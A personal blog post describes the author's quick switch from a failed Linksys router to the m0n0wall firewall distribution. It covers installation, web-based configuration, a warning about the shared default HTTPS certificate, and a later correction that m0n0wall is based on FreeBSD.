My home LAN's firewall router died last night. I had an old Linksys with which I was fairly satisified. It's cheap, quiet, doesn't use much power, and of course, keeps people off my network. When it died, I was kind of annoyed (I've only had it about 18 months) but I've seen this coming for a few days now. Firewall crashes, DHCP problems and the unexplained inability to access the management port while Internet access is working had been the normal state of affairs. This is all to say that I'd been looking around.

Since I'm a hands-on kinda guy, I have been looking around at some of the specialized firewall OS distributions, all Open Source. The leader here seems to be m0n0wall, which is a stripped down OpenBSD. When my firewall finally died, I had already downloaded the distribution CD image (about 5MB), but hadn't tried it out yet. So of course, I figured "no time like the present."

I was very pleasantly surprised to learn that the whole installation and configuration experience took me only about 20 minutes. About half that time was spent removing a network card from an older system and adding it to the firewall box and burning the ISO image to a CDR.

I started by booting the CDROM and configuring the NICs. Not being a BSD user, I would never have guessed that my interfaces were named things like dc0 or xl0, but fortunately m0n0wall has a nifty autodetection routine that will detect which cards you have available and which is plugged into the LAN or the WAN side of your network. I didn't have to know anything about BSD NICs, so that was nice.

After that, everything was done via the web interface. I plugged in my powerbook (yay for the magic no-crossover-cable-required Ethernet port!) and started configuring. If you're used to consumer grade products like my old Linksys, you'll be glad to hear that m0n0wall supports HTTPS connection security, although not by default. In what is probably the only gotcha in the whole process, m0n0wall will not generate a unique SSL certificate for you, so you're sharing the same cert used by every other m0n0wall owner. If you haven't changed the certificate, you have no security. There is a GUI interface to upload your own certificate, but you have to generate it yourself. M0n0wall won't do this for you.

Shortly thereafter, I had the whole thing up and running. NTP, DHCP server & client, Dynamic DNS and traffic shaping. I even had the chance to try out some of the snazzy statistics features, like the interface usage graphs, which are very impressive. Take that, Linksys!

Overall, I'm very impressed with the software. The hardware is a stock PC, though, which eats power and generates noise. The m0n0wall software also supports the Soekris 45xx and 48xx series systems, which seems like a good platform for this application. I'll probably try this eventually, but in the meantime I'm loving the creamy m0n0wall goodness.

Update 2006-02-02 09:21 Sorry, m0n0wall is a stripped down version of FreeBSD, not OpenBSD as I mentioned above.